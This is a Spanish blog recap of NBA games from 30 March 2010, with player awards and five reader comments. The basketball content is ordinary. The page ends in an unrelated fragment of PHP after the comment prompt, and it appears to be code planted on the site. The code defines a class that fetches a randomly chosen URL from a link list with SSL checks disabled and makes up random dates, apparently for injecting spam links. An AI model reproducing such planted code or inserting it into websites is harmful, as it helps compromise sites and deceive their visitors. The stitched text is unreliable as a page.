La crónica (30/03/2010)

31 de March de 2010 por telekoman

Rebelión de los modestos, al menos en lo individual. Fue la noche de los Blatche, Murray, Ilyasova, Budinger… aunque efectivamente no hubo ninguna sorpresa en el plano colectivo, ni tampoco intensas sensaciones.

Lo más interesante fue el Phoenix@Chicago. Los Suns alargaron la mejor racha de victorias de la temporada, pese a un segundo cuarto en el que los Bulls les desarbolaron totalmente. Fue hasta que perdieron a Hinrich, su mejor exterior defensivo, con un fuerte esguince. Tremendo castigo. Si permites a los Suns colarte un 50% en triples lo llevas claro. Con la confianza que les dió el momento fue un auténtico acribillamiento. 14 triples de 28 intentos. No va más. Bonito duelo entre Nash y Rose hablando de legados de bases. Fueron dos no habituales los que definieron el partido. Flip Murray por un lado y Jason Richardson por otro. Esta derrota deja a los Bulls a partido y medio de Toronto con sólo 8 partidos por disputar.

También firmaron un 50% de triples los Thunder en Philadelphia, aunque lanzaron bastante menos. Partido serio de los de Oklahoma superando a sus rivales básicamente en todo. 8 tíos rondando las dobles figuras con Durant sentando cátedra en la anotación, 26 puntos y 10 rebotes, mientras que Westbrooks lo hacía en la dirección, 14 asistencias. Los Sixers no están para este tipo de batallas este año. Elton Brand junto con Iguodala nos recordaron por momentos porqué a algunos nos gustaba este equipo. El resto de los jugadores se empeñaron en recordarnos por qué a la mayoría no.

Espectáculo del bueno dieron los Bucks, en especial un inspirado Ilyasova y un renacido Stackhouse. Hablamos mucho de la defensa de Schiles, anoche no fue mala en ese sentido. Lo mejor, sin embargo, fue un juego de pase casi coral. Como en los viejos tiempos de los Kings de Adelman. 3 asistencias de media por cabeza de entre los 8 jugadores que disputaron más de 10 minutos. El dato contrasta tremendamente con unos Clippers que sólo contaban con Blake de distribuidor y únicamente Gooden y Kaman plantearon aglo de batalla. Estarán pensando en las vacaciones.

El duelo más igualado fue el Wizards Vs. Rockets. El talón de aquiles que arrastra Houston toda la temporada (Chuck Hayes el center titular) lo aprovechó en esta ocasión Andray Blatche para marcarse uno de sus mejores partidos de la temporada. Por parte de los Rockets respondió Budinger. Las comparaciones son odiosas, pero mientras el rookie anotó 24 puntos con una serie de 9-13 el alero que le cierra la plaza de titular, Trevor Ariza, cuajó un inmaculado 0 de 7. Lo comido por lo bebido los Rockets se impusieron por 4 puntos, remontando en el último cuarto.

Finalmente los Pacers, en el primer partido del día, engrosaron la cuenta de derrotas consecutivas de Sacaramento, y van 5, a pesar de que Tyreke volvió a rondar el triple doble. Granger es mucho Granger en forma… aunque la haya cogido demasiado tarde.

MVP: Danny Granger. 33 puntos, 5 rebotes, 4 asistencias tienen la culpa.

El rookie: Buenas actuaciones de Tyreke Evans o Taj Gibson, que perdieron. Jennings sí logró dirigir a su equipo a la victoria con 17 puntos, 5 rebotes, 6 asistencias.

La sorpresa: Buenas actuaciones de secundarios. De entre todo lo bueno que hubo nos quedamos con Jerry Stackhouse, viviendo una segunda juventud tras su conato de retirada.

La decepción: Ya lo hemos nombrado. Ariza está sufriendo una temporada irregular de una exigencia mayor a la que estaba acostumbrado. Anoche un rosco.

El mayor esfuerzo en vano: También grandes ejemplos en este sentido. Blatche nada menos que 31 puntos, 10 rebotes, 3 asistencias y Flip Murray 23 puntos, 9 rebotes, 4 asistencias saliendo desde el banco.

Comenta

5 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    A Budinguer espero que lo aproveche mas Adelman el año que viene, que es un jugador muy bueno para cambiar partidos desde el banco si siguen confiando en Ariza como titular.

      Citar

  2. LEmontus dice:
    #2

    Tocando el debate Jennings-Ricky no creo que Ricky haga lo que esta haciendo brandon, además de llevar a Po a un equipo que a principio de temporada era a priori el peor de la nba y sus buenos números; cuyo único punto negro es el porcentaje en tiros(que no de triples). Además no creo que minesota deposite en él tanta confianza como la que se ha ganado Bj aunque en flynn están confiando mucho(demasiado para mi gusto).

      Citar

  3. LEmontus dice:
    #3

    Por cierto lo de blatche…. no se yo donde puede llegar este jugador y donde pueden llegar wizards el año que viene con arenas blatche y otro grande que tienen espacio.

      Citar

  4. max dice:
    #4

    Gran final de temporada de Indiana, que sin jugarse nada ha ganado 6 de los siete últimos partidos. En contraposición a Washington, Detroit o Minnesota ( y alguno más) que han tirado la temporada ya hace semanas y sólo desvirtuan la competición. No sé si es en busca de la loteria del draft o es que no dan más de si.

      Citar

  5. Txusma dice:
    #5

    Lo que le falta a Blatche es cabecita pq condiciones tiene. Eso sí, esperemos que haya aprendido a defender en este tiempo q se ha pasado en el banco (que no ha sido poco)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>